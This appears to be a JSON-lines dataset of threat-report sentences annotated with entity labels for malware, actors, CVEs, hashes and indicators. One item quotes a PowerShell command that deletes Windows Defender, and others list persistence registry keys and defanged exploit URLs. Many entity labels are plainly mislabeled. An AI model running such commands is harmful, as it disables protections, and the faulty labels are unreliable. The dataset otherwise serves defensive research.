need to enable macro for it to open fully, which would use AutoHotkey in loading the malicious script file to avoid detection.","entities":[],"relations":[],"Comments":[]} {"id":2978,"text":"You may consider configuring it to not broadcast the SSID as well: that can make adding devices a little harder, but that means it\u2019s even harder for people to try and join your home network. 3. Set up More Secure Accounts on Your PCs and Macs: PCs and Macs (both desktop and laptop) are still around and as important as ever in the home.","entities":[],"relations":[],"Comments":[]} {"id":2417,"text":"For example, there is a simple classical application scenario in which the developer creates a trade object to capture request parameters as shown in Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":8234,"text":"As such, here are some tips on how to stay safe from these online schemes: Carefully scrutinize all emails.","entities":[{"id":25443,"label":"location","start_offset":14,"end_offset":17},{"id":25444,"label":"threat-actor","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} {"id":13179,"text":"USBferry attack scenario, version UF1.0 20160226","entities":[{"id":41125,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":10020,"text":"(rcview40u.dll)","entities":[],"relations":[],"Comments":[]} {"id":470,"text":" DGA by itself can\u2019t harm you.","entities":[],"relations":[],"Comments":[]} {"id":9573,"text":"Accept-Encoding: gzip Connection: Keep-Alive","entities":[],"relations":[],"Comments":[]} {"id":2376,"text":"StealthVector is designed with various configurable features that make it easy for malicious actors to modify and tailor it to their needs, including a feature that disables Event Tracing for Windows (ETW), allowing the malware to run in stealth mode.","entities":[{"id":45481,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":5476,"text":"Figure 1: Tweety Chat\u2019s interface (top), and code snippets showing the file types it steals (bottom) Romance in cyberespionage","entities":[{"id":51468,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} {"id":6557,"text":" hack520[.]co[.]kr shaiya[.]kr zhu[.]kr shenqi[.]kr zhuxian[.]kr Several of these domains are linked to variants of malware that were used by the Winnti threat actor.","entities":[{"id":20316,"label":"location","start_offset":91,"end_offset":94},{"id":20317,"label":"malware","start_offset":147,"end_offset":153}],"relations":[],"Comments":[]} {"id":3884,"text":"Last June 9, 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released the Rising Ransomware Threat to OT Assets, which addresses the recent rise in ransomware attacks targeting operational assets (OT) and control systems.","entities":[{"id":49744,"label":"TIME","start_offset":5,"end_offset":17},{"id":49745,"label":"identity","start_offset":23,"end_offset":78}],"relations":[],"Comments":[]} {"id":14419,"text":"Including detection of this as part of an overall XDR platform will improve the prevention, detection, and remediation of sophisticated attacks on an organization.","entities":[{"id":47173,"label":"SOFTWARE","start_offset":50,"end_offset":54}],"relations":[],"Comments":[]} {"id":3930,"text":"To deploy its tools, it uses the expand command to extract package files dropped in the system.","entities":[],"relations":[],"Comments":[]} {"id":770,"text":"If we were able to make the size of the current heap block in this structure larger than the threshold of 0x186A0 bytes and trigger CMemoryProtector::ProtectedFree, it is still possible to force a true freeing action and occupy the freed object with other data as we show in the following piece of javascript code in figure 6. Figure 6. Javascript proof of concept to force freeing When creating the anchor element, the debug logs are shown in figure 7.","entities":[{"id":46347,"label":"SOFTWARE","start_offset":340,"end_offset":350}],"relations":[],"Comments":[]} {"id":5810,"text":"And you just have computers fighting it out.","entities":[{"id":17969,"label":"location","start_offset":0,"end_offset":3},{"id":17970,"label":"identity","start_offset":8,"end_offset":12}],"relations":[],"Comments":[]} {"id":6052,"text":"Example Exploit Kit:","entities":[],"relations":[],"Comments":[]} {"id":2231,"text":"Persistence is achieved by setting the following registry key: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run The name of the registry key in the above instances is derived from the basename of the supplied argument.","entities":[{"id":6650,"label":"REGISTRYKEY","start_offset":64,"end_offset":114},{"id":6651,"label":"REGISTRYKEY","start_offset":116,"end_offset":166}],"relations":[],"Comments":[]} {"id":771,"text":"The address of the anchor element is 0x0c3b3f98.","entities":[],"relations":[],"Comments":[]} {"id":11767,"text":"A few were observed displaying a fake error message requiring user click-through to continue execution.","entities":[],"relations":[],"Comments":[]} {"id":14293,"text":"When users register, their credit cards will be charged.","entities":[],"relations":[],"Comments":[]} {"id":1168,"text":"While the research may never result in a fully automated decision system, it has been proven that researchers employing a hybrid approach to analysis will be able to provide critical and timely information to support the continual improvement of the classification system as a whole.","entities":[],"relations":[],"Comments":[]} {"id":1545,"text":"These attacks begin with an email sent to a carefully chosen target in the agency.","entities":[],"relations":[],"Comments":[]} {"id":4682,"text":"When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.","entities":[],"relations":[],"Comments":[]} {"id":4813,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50736,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} {"id":7979,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":24726,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} {"id":7326,"text":"idtpl[.]org registration information based on Whois Lookup But from the middle of July 2020, its IP address changed to 185[.]117[.]88[.]91. Figure 22. Domain History of idtpl[.]org as seen on VirusTotal","entities":[{"id":22803,"label":"IPV4","start_offset":123,"end_offset":142}],"relations":[],"Comments":[]} {"id":2502,"text":"gdGCT.jsp","entities":[{"id":45552,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":516,"text":"Figure 2 shows a completely different result from Figure 1 and stems from only counting ransomware samples from cases in which more than five hosts were infected with the same malware.","entities":[],"relations":[],"Comments":[]} {"id":3673,"text":"Initial Access","entities":[],"relations":[],"Comments":[]} {"id":4519,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users\u2019 hands.","entities":[{"id":50317,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":1616,"text":"If the user would like to unsubscribe they can text \u201cBAJA\u201d to 797977.","entities":[],"relations":[],"Comments":[]} {"id":9502,"text":"The infection starts with an executable written in C++ that connects through a Winsock API to a domain or IP address in a specific port.","entities":[],"relations":[],"Comments":[]} {"id":5192,"text":"Network amplification CVE-2021-38445 OpenDDS, ROS 2 7.0 CWE-130: Improper handling of length CVE-2021-38423 Gurum DDS, ROS 2 8.6 CWE-131: Incorrect calculation of buffer size CVE-2021-38435 Connext DDS, ROS 2 8.6 CVE-2021-38439 Gurum DDS, ROS 2 8.6 CWE-122:","entities":[{"id":51240,"label":"vulnerability","start_offset":22,"end_offset":36},{"id":51241,"label":"vulnerability","start_offset":93,"end_offset":107},{"id":51242,"label":"vulnerability","start_offset":175,"end_offset":189},{"id":51243,"label":"vulnerability","start_offset":213,"end_offset":227}],"relations":[],"Comments":[]} {"id":14353,"text":"It was in April 2017 when the last Windows variant of Maikspy appeared with the following changes: The C&C server was changed to 198[.]12[.]155[.]84, password theft is added, as well as the theft of .doc, .docx, and .rtf files.","entities":[{"id":51794,"label":"TIME","start_offset":10,"end_offset":20},{"id":51795,"label":"malware","start_offset":54,"end_offset":61},{"id":44340,"label":"IPV4","start_offset":129,"end_offset":148}],"relations":[],"Comments":[]} {"id":5635,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":8295,"text":"Indicators of CompromiseFiles with the following hashes were used in the first series of attacks: cd8329f75b1393ead3e16c6c79ee1ab476e6487370481e5931feb63305f00983 \u2013 detected as VBS_KEYLOG.NYKW f46f0e8eed0361294200d64e87b3fb13f6a3797f99f5b588444534f27612a590 \u2013 archive file;","entities":[{"id":25565,"label":"SHA1","start_offset":99,"end_offset":163},{"id":25566,"label":"MD5","start_offset":194,"end_offset":258}],"relations":[],"Comments":[]} {"id":4265,"text":"One file stealer (cca74bb322ad7833a21209b1418c9837e30983daec30d199a839f46075ee72f2, Detected as TSPY_DELF.SUW) published by security researchers in 2013 and linked to the domain myflatnet[.]com, was attributed by several parties to the Hangover group.","entities":[{"id":50067,"label":"threat-actor","start_offset":236,"end_offset":250},{"id":50063,"label":"SHA2","start_offset":18,"end_offset":82},{"id":50064,"label":"malware","start_offset":96,"end_offset":109},{"id":50065,"label":"TIME","start_offset":148,"end_offset":152},{"id":50066,"label":"DOMAIN","start_offset":178,"end_offset":193}],"relations":[{"id":911,"from_id":50063,"to_id":50064,"type":"indicates"},{"id":912,"from_id":50064,"to_id":50066,"type":"communicates-with"},{"id":913,"from_id":50064,"to_id":50067,"type":"attributed-to"}],"Comments":[]} {"id":1135,"text":" This malware is well documented as a powerful polymorphic worm that encrypts itself differently every time it propagates.","entities":[],"relations":[],"Comments":[]} {"id":8431,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":25979,"label":"threat-actor","start_offset":28,"end_offset":38},{"id":25980,"label":"location","start_offset":59,"end_offset":62},{"id":25981,"label":"location","start_offset":95,"end_offset":98},{"id":25982,"label":"location","start_offset":105,"end_offset":109},{"id":25983,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} {"id":11888,"text":"Unique URLs serving \u200b\u200bCVE-2021-33742 Internet Explorer exploit: http:\/\/lioiamcount[.]com\/IsnoMLgankYg6\/EjlYIy7cdFZFeyFqE4IURS1 http:\/\/db-control-uplink[.]com\/eFe1J00hISDe9Zw\/gzHvIOlHpIXB http:\/\/kidone[.]xyz\/VvE0yYArmvhyTl\/GzV","entities":[{"id":36639,"label":"URL","start_offset":64,"end_offset":88},{"id":36640,"label":"URL","start_offset":127,"end_offset":136},{"id":36641,"label":"URL","start_offset":187,"end_offset":206}],"relations":[],"Comments":[]} {"id":14116,"text":"When you have many samples to analyze, you can refine that expectation over time.","entities":[],"relations":[],"Comments":[]} {"id":6366,"text":"This data includes the encrypted configuration settings for Brute Ratel C4.","entities":[],"relations":[],"Comments":[]} {"id":8513,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":26286,"label":"location","start_offset":85,"end_offset":88},{"id":26288,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} {"id":2399,"text":"Two days later on March 31, 2022, Spring released version 5.3.18 and 5.2.20 of Spring Framework to patch another more severe vulnerability tracked in CVE-2022-22965.","entities":[{"id":47472,"label":"TIME","start_offset":18,"end_offset":32},{"id":47473,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":47474,"label":"SOFTWARE","start_offset":79,"end_offset":95},{"id":47475,"label":"vulnerability","start_offset":150,"end_offset":164}],"relations":[{"id":333,"from_id":47474,"to_id":47475,"type":"has"}],"Comments":[]} {"id":8909,"text":"Trend Micro Solutions Trend Micro\u2019s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise \u2014 including email, endpoints, servers, cloud workloads, and networks \u2014 making faster connections to identify and stop attacks.","entities":[{"id":27530,"label":"location","start_offset":75,"end_offset":79},{"id":27532,"label":"location","start_offset":177,"end_offset":187},{"id":27533,"label":"location","start_offset":227,"end_offset":232},{"id":27534,"label":"location","start_offset":244,"end_offset":247},{"id":27535,"label":"location","start_offset":297,"end_offset":300},{"id":27536,"label":"malware","start_offset":301,"end_offset":305}],"relations":[],"Comments":[]} {"id":967,"text":"MySd2e Service registers receiver for Rf2b ","entities":[],"relations":[],"Comments":[]} {"id":13605,"text":"As described earlier, the XSS attack script redirects the victim to a fake Flash download site.","entities":[{"id":42403,"label":"attack-pattern","start_offset":26,"end_offset":29}],"relations":[],"Comments":[]} {"id":2864,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":14408,"text":"Leverage WMI for fileless intrusion Execute Powershell script for fileless intrusion","entities":[{"id":47166,"label":"attack-pattern","start_offset":66,"end_offset":84},{"id":44534,"label":"tools","start_offset":44,"end_offset":54}],"relations":[{"id":309,"from_id":44534,"to_id":47166,"type":"uses"}],"Comments":[]} {"id":564,"text":"After infection, Virlock hides the file extension through modification of the registry (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt = 1, HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden = 2).","entities":[{"id":1874,"label":"REGISTRYKEY","start_offset":88,"end_offset":164},{"id":1876,"label":"REGISTRYKEY","start_offset":170,"end_offset":241},{"id":44778,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":165,"from_id":1874,"to_id":44778,"type":"indicates"},{"id":166,"from_id":1876,"to_id":44778,"type":"indicates"}],"Comments":[]} {"id":4054,"text":"After the backdoor is launched, it will decrypt the embedded C&C configuration via AES (CTR mode) algorithm for the following connection.","entities":[],"relations":[],"Comments":[]} {"id":6448,"text":"RemoteUtilities Analysis","entities":[{"id":20076,"label":"tools","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":4561,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50378,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} {"id":5298,"text":" It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data.","entities":[],"relations":[],"Comments":[]} {"id":2313,"text":"The exploit chain combined an RCE in WebKit exploiting CVE-2021-1789 which was patched on Jan 5, 2021 before discovery of this campaign and a 0-day local privilege escalation in XNU (CVE-2021-30869) patched on Sept 23, 2021.","entities":[{"id":45456,"label":"vulnerability","start_offset":55,"end_offset":68},{"id":45462,"label":"SOFTWARE","start_offset":178,"end_offset":181},{"id":45460,"label":"TIME","start_offset":210,"end_offset":223},{"id":45461,"label":"attack-pattern","start_offset":148,"end_offset":174},{"id":45457,"label":"SOFTWARE","start_offset":37,"end_offset":43},{"id":45458,"label":"TIME","start_offset":90,"end_offset":101},{"id":45459,"label":"vulnerability","start_offset":183,"end_offset":197}],"relations":[{"id":98,"from_id":45456,"to_id":45457,"type":"has"},{"id":99,"from_id":45459,"to_id":45462,"type":"has"}],"Comments":[]} {"id":4341,"text":". Figure 4. Code showing the main function of the file stealer ","entities":[],"relations":[],"Comments":[]} {"id":3813,"text":"The commands and output of Koadic will change according to the ANEL version used in the attack.","entities":[{"id":49686,"label":"malware","start_offset":27,"end_offset":33},{"id":49685,"label":"malware","start_offset":63,"end_offset":67}],"relations":[],"Comments":[]} {"id":3846,"text":"For example, the initial ANEL version, \u201c5.0.0 beta1,\u201d uses a different C&C server compared to the other versions.","entities":[{"id":11660,"label":"malware","start_offset":25,"end_offset":29}],"relations":[],"Comments":[]} {"id":7332,"text":"Chi Ngoc Canada Backdoor.SH.OCEANLOTUS.F 05e5ba08be06f2d0e2da294de4c559ca33c4c28534919e5f2f6fc51aed4956e3 2nd stage fat binary Backdoor.MacOS.OCEANLOTUS.F fd7e51e3f3240b550f0405a67e98a97d86747a8a07218e8150d2c2946141f737 3rd stage fat binary Backdoor.MacOS.OCEANLOTUS.F Domains mihannevis[.]com mykessef[.]com idtpl[.]org MITRE TTP Tactic ID Name","entities":[{"id":22822,"label":"location","start_offset":0,"end_offset":3},{"id":22823,"label":"location","start_offset":9,"end_offset":15},{"id":22824,"label":"SHA1","start_offset":43,"end_offset":107},{"id":22825,"label":"SHA2","start_offset":160,"end_offset":224}],"relations":[],"Comments":[]} {"id":7768,"text":" Figure 20.","entities":[],"relations":[],"Comments":[]} {"id":2069,"text":"The videos had no sound, but the threat actor would type commentary on a terminal to address something the viewer was observing on screen.","entities":[],"relations":[],"Comments":[]} {"id":10671,"text":"Table 1: The 15 vulnerabilities weaponized since 2017 CVE ID cvss3 score Description CVE-2021-42013 9.8 Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) CVE-2021-41773 7.5","entities":[{"id":32570,"label":"attack-pattern","start_offset":105,"end_offset":119},{"id":32571,"label":"location","start_offset":120,"end_offset":123},{"id":32572,"label":"location","start_offset":124,"end_offset":130},{"id":32573,"label":"location","start_offset":149,"end_offset":155},{"id":32574,"label":"location","start_offset":175,"end_offset":178},{"id":32575,"label":"location","start_offset":214,"end_offset":219},{"id":32576,"label":"location","start_offset":230,"end_offset":235}],"relations":[],"Comments":[]} {"id":5101,"text":"The attackers made multiple attempts to use the exploit days after the vulnerability was patched on February 14, which stresses the importance of applying security updates as they become available.","entities":[{"id":51206,"label":"TIME","start_offset":100,"end_offset":111}],"relations":[],"Comments":[]} {"id":2169,"text":"Microsoft recommends that customers of Microsoft Defender for Endpoint enable the attack surface reduction rule BlockOfficeCreateProcessRule.","entities":[{"id":45408,"label":"identity","start_offset":0,"end_offset":9},{"id":45409,"label":"SOFTWARE","start_offset":39,"end_offset":70}],"relations":[],"Comments":[]} {"id":2886,"text":" Neither of these variables is actually used in this exploit.","entities":[],"relations":[],"Comments":[]} {"id":3097,"text":" Because these vulnerabilities affect the processors at the physical layer, the only way for the vulnerabilities to be fully addressed is for the processors to be replaced or to have a firmware update.","entities":[],"relations":[],"Comments":[]} {"id":7493,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":13905,"text":" Execution and impact The execution of the actual ransomware occurs next.","entities":[],"relations":[],"Comments":[]} {"id":13486,"text":"Our actions against coordinated influence operations from January, February and March can be found in the Q1 Bulletin.","entities":[{"id":51557,"label":"TIME","start_offset":58,"end_offset":65},{"id":51558,"label":"TIME","start_offset":67,"end_offset":75},{"id":51559,"label":"TIME","start_offset":80,"end_offset":85}],"relations":[],"Comments":[]} {"id":11733,"text":"-ms[.]net C&C cdn-sop[.]net C&C fqn-cloud[.]net C&C ms-trace[.]net C&C imail.aop.gov-af[.]org Phishing Domain mail-apfgavnp.hopto[.]org Phishing Domain mail-apfgovnp.ddns[.]net Phishing Domain mail-kmgcom.ddns[.]net Phishing Domain mail-mfagovcn.hopto[.]org Phishing Domain mail","entities":[{"id":36141,"label":"attack-pattern","start_offset":115,"end_offset":123},{"id":36142,"label":"attack-pattern","start_offset":162,"end_offset":170},{"id":36143,"label":"attack-pattern","start_offset":208,"end_offset":216},{"id":36144,"label":"attack-pattern","start_offset":252,"end_offset":260},{"id":36145,"label":"attack-pattern","start_offset":299,"end_offset":307}],"relations":[],"Comments":[]} {"id":2843,"text":"There have been several theories: Unit 42 believes the most likely delivery method is method #2.","entities":[{"id":48048,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":716,"text":"If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":46283,"label":"attack-pattern","start_offset":55,"end_offset":76},{"id":46284,"label":"attack-pattern","start_offset":81,"end_offset":99}],"relations":[],"Comments":[]} {"id":11250,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[{"id":34390,"label":"location","start_offset":72,"end_offset":82},{"id":34391,"label":"location","start_offset":97,"end_offset":100},{"id":34392,"label":"threat-actor","start_offset":139,"end_offset":143},{"id":34393,"label":"location","start_offset":195,"end_offset":205}],"relations":[],"Comments":[]} {"id":13634,"text":"Online shop administrators should be aware that potential attacks may come not only from spam but also from different \u2014 and unexpected \u2014 infection vectors.","entities":[],"relations":[],"Comments":[]} {"id":1937,"text":"We did not find Urpage victims in our telemetry, likely because of the targeted nature of these attacks.","entities":[{"id":5704,"label":"threat-actor","start_offset":16,"end_offset":22}],"relations":[],"Comments":[]} {"id":5009,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[{"id":51062,"label":"TIME","start_offset":9,"end_offset":17}],"relations":[],"Comments":[]} {"id":3917,"text":"The attack features the following script:","entities":[],"relations":[],"Comments":[]} {"id":1866,"text":"Once inside, the continuing trend of abusing legitimate tools and functions to mask malicious activities and actors\u2019 presence","entities":[],"relations":[],"Comments":[]} {"id":8141,"text":"When encrypting, it creates a block of data we named headData.","entities":[],"relations":[],"Comments":[]} {"id":12446,"text":"We terminated 35 YouTube channels as part of our investigation into coordinated influence operations linked to Azerbaijan.","entities":[],"relations":[],"Comments":[]} {"id":13977,"text":"It also misses the incredible importance of identifying tactics, techniques, and tools used by global threat actor groups today.","entities":[],"relations":[],"Comments":[]} {"id":14283,"text":"Get and upload dedicated directory file list ","entities":[],"relations":[],"Comments":[]} {"id":5149,"text":"I'm going to drive back to the store.","entities":[],"relations":[],"Comments":[]} {"id":3096,"text":" Because these affect processors, this means that the operating systems and applications that run on top of these processors are vulnerable.","entities":[],"relations":[],"Comments":[]} {"id":4135,"text":"During our investigation, we found evidence of specific tools, which we listed in Table 1.","entities":[],"relations":[],"Comments":[]} {"id":1595,"text":"Palo Alto Networks WildFire detected a new Android Trojan on May 7th, 2014 when a customer using our enterprise security platform downloaded the malicious application from the Google Play store.","entities":[{"id":46841,"label":"TIME","start_offset":61,"end_offset":74},{"id":46840,"label":"SOFTWARE","start_offset":0,"end_offset":27},{"id":46842,"label":"SOFTWARE","start_offset":176,"end_offset":193}],"relations":[],"Comments":[]} {"id":6450,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":12297,"text":"We received leads from the FBI that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} {"id":1705,"text":"Antivirus programs running on the PC are trying eradicate the threat, the command and control domains and IPs are being added to denylist and blocked by networks around the world.","entities":[],"relations":[],"Comments":[]} {"id":14065,"text":"This is a JavaScript file that executes with wscript.exe.","entities":[],"relations":[],"Comments":[]} {"id":588,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":12641,"text":"It generates the needed key and initialization vector (IV) using a salt and secret key; the former is embedded in the code while the latter is generated dynamically using the SHA-256 hash of a randomly generated 32-byte long string.","entities":[{"id":39247,"label":"location","start_offset":28,"end_offset":31},{"id":39248,"label":"tools","start_offset":47,"end_offset":53},{"id":39249,"label":"location","start_offset":67,"end_offset":71},{"id":39250,"label":"location","start_offset":72,"end_offset":75},{"id":39252,"label":"location","start_offset":220,"end_offset":224}],"relations":[],"Comments":[]} {"id":12327,"text":"We terminated 3 YouTube channels as part of our investigation into coordinated influence operations linked to France.","entities":[],"relations":[],"Comments":[]} {"id":10750,"text":"While xxmm2_builder allows REDBALDKNIGHT to customize the settings of XXMM, xxmm2_ steganography is used to hide malicious code within an image file.","entities":[{"id":32853,"label":"threat-actor","start_offset":27,"end_offset":40},{"id":32854,"label":"malware","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} {"id":9171,"text":"Unfortunately, Lurk is just one of the many cybercriminal groups looking to profit from organizations and end users.","entities":[{"id":28296,"label":"identity","start_offset":23,"end_offset":27},{"id":28297,"label":"location","start_offset":28,"end_offset":31},{"id":28298,"label":"location","start_offset":39,"end_offset":43},{"id":28299,"label":"location","start_offset":102,"end_offset":105}],"relations":[],"Comments":[]} {"id":3800,"text":"Figure 2. Exploitation of CVE-2017-11882","entities":[{"id":49672,"label":"vulnerability","start_offset":26,"end_offset":40}],"relations":[],"Comments":[]} {"id":12576,"text":"It still worked.","entities":[],"relations":[],"Comments":[]} {"id":13064,"text":"This article lists the known malware strains that have been used over the past two years to install ransomware, all of which should serve as a \"code red\" moment for any organization.","entities":[],"relations":[],"Comments":[]} {"id":961,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":2041,"text":"One possibility is that it is used to monitor ransomed systems for blue team and incident response (IR) activity, though even in that case it is unusual to see offensive tools dropped at this point in the infection.","entities":[],"relations":[],"Comments":[]} {"id":5442,"text":"The Brazilian Central Bank recently announced that 2017 was the first year in which people did more banking using mobile devices than on PCs.","entities":[{"id":51441,"label":"identity","start_offset":4,"end_offset":26},{"id":51442,"label":"TIME","start_offset":51,"end_offset":55}],"relations":[],"Comments":[]} {"id":2446,"text":"There are two variants of the webshell.","entities":[],"relations":[],"Comments":[]} {"id":896,"text":" The following registry keys are also used within the CLOCK sub-path by PClock2: PClock2 proceeds to use the API from blockchain.info to generate a unique Bitcoin (BTC) wallet identifier, which is configured to automatically forward payments to a hardcoded wallet identifier of \u20181MRfkK134ErfbcadUSoSUCBahngCqoBKju\u2019.","entities":[{"id":46423,"label":"malware","start_offset":72,"end_offset":79},{"id":46424,"label":"malware","start_offset":82,"end_offset":89},{"id":46425,"label":"DOMAIN","start_offset":119,"end_offset":134}],"relations":[],"Comments":[]} {"id":5455,"text":" They\u2019re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life. Got a topic you want us to write about for you, your friends, or your family?","entities":[{"id":51445,"label":"identity","start_offset":25,"end_offset":72}],"relations":[],"Comments":[]} {"id":13198,"text":"The traffic is encrypted to evade detection.","entities":[],"relations":[],"Comments":[]} {"id":1599,"text":" A developer using the ID \u201cfun app\u201d published the Trojan, and the remote control application they uploaded on April 21 is their most successful app so far, with between 10,000 and 50,000 downloads on the play store.","entities":[{"id":46846,"label":"TIME","start_offset":110,"end_offset":118}],"relations":[],"Comments":[]} {"id":3370,"text":".Python.BIOPASS.A e479823aa41d3f6416233dba8e765cf2abaa38ad18328859a20b88df7f1d88d5 sc2.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A e567fd0f08fdafc5a89c9084373f3308ef464918ff7e4ecd7fb3135d777e946d sc3.txt","entities":[{"id":10186,"label":"malware","start_offset":94,"end_offset":105},{"id":10187,"label":"tools","start_offset":114,"end_offset":127},{"id":10188,"label":"SHA2","start_offset":164,"end_offset":228},{"id":10185,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48989,"label":"malware","start_offset":139,"end_offset":162},{"id":48987,"label":"malware","start_offset":1,"end_offset":17},{"id":48988,"label":"FILEPATH","start_offset":85,"end_offset":92},{"id":48990,"label":"FILEPATH","start_offset":230,"end_offset":237}],"relations":[{"id":548,"from_id":10185,"to_id":10186,"type":"indicates"},{"id":549,"from_id":48988,"to_id":10186,"type":"indicates"},{"id":553,"from_id":10187,"to_id":48989,"type":"related-to"},{"id":550,"from_id":48987,"to_id":10186,"type":"duplicate-of"},{"id":551,"from_id":10185,"to_id":48988,"type":"duplicate-of"},{"id":552,"from_id":10186,"to_id":10187,"type":"uses"},{"id":554,"from_id":10188,"to_id":48989,"type":"indicates"},{"id":555,"from_id":48990,"to_id":48989,"type":"indicates"},{"id":556,"from_id":48989,"to_id":10186,"type":"duplicate-of"}],"Comments":[]} {"id":4216,"text":"The second fake website is again related to chat, with a background suggesting that it can help find users a partner.","entities":[],"relations":[],"Comments":[]} {"id":13567,"text":"We observed that the scripts used during the attacks were customized.","entities":[],"relations":[],"Comments":[]} {"id":11637,"text":"We learned that these pages were copied from their victims\u2019 webmail login pages and subsequently modified for phishing.","entities":[{"id":35709,"label":"location","start_offset":3,"end_offset":10},{"id":35710,"label":"location","start_offset":80,"end_offset":83},{"id":35711,"label":"attack-pattern","start_offset":110,"end_offset":118}],"relations":[],"Comments":[]} {"id":13516,"text":"Consider using dedicated two-factor authentication apps or devices such as Yubikey instead of relying on SMS.","entities":[],"relations":[],"Comments":[]} {"id":10078,"text":"This was carried out via a compromised version of a network monitoring application called SolarWinds Orion.","entities":[],"relations":[],"Comments":[]} {"id":152,"text":"In some cases, the ransomware is sophisticated enough to target specific application files.","entities":[],"relations":[],"Comments":[]} {"id":1056,"text":"An \u201coverlay attack\u201d is an attack where an attacker\u2019s app draws a window over (or \u201coverlays\u201d) other windows and apps running on the device.","entities":[{"id":44926,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} {"id":4713,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50607,"label":"malware","start_offset":102,"end_offset":109},{"id":50608,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50606,"label":"SOFTWARE","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} {"id":2935,"text":"While we can\u2019t see how many people the other half of the samples affect, it\u2019s a reasonable supposition that the other half of the total samples affect just as many people as the half we can see.","entities":[],"relations":[],"Comments":[]} {"id":4459,"text":"In 2017, Android \u2013 which is owned by Google \u2013 was the first mobile platform to warn users about NSO Group\u2019s Pegasus spyware.","entities":[{"id":50241,"label":"malware","start_offset":108,"end_offset":115},{"id":50237,"label":"TIME","start_offset":3,"end_offset":7},{"id":50240,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50238,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50239,"label":"identity","start_offset":37,"end_offset":43}],"relations":[{"id":933,"from_id":50241,"to_id":50240,"type":"authored-by"}],"Comments":[]} {"id":2607,"text":"A hallmark of this group is the diversity of techniques used both for initial access and action-on-objective.","entities":[],"relations":[],"Comments":[]} {"id":2789,"text":" The good news is that these attacks are more like denial of service attacks: they don\u2019t do lasting harm to your system and they end when you leave the site. The bad news is that these are harder to defend against than typical drive-by download attacks.","entities":[],"relations":[],"Comments":[]} {"id":1384,"text":"PowerShell process used to delete Windows Defender, e.g. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse 8. File InstallUtil.exe running from C:\\Users\\[USERNAME]\\AppData\\Local\\Temp directory.","entities":[{"id":4148,"label":"tools","start_offset":0,"end_offset":10},{"id":46727,"label":"FILEPATH","start_offset":122,"end_offset":163},{"id":46726,"label":"FILEPATH","start_offset":57,"end_offset":114},{"id":46728,"label":"FILEPATH","start_offset":183,"end_offset":198},{"id":46725,"label":"tools","start_offset":34,"end_offset":50},{"id":46729,"label":"FILEPATH","start_offset":212,"end_offset":251}],"relations":[],"Comments":[]} 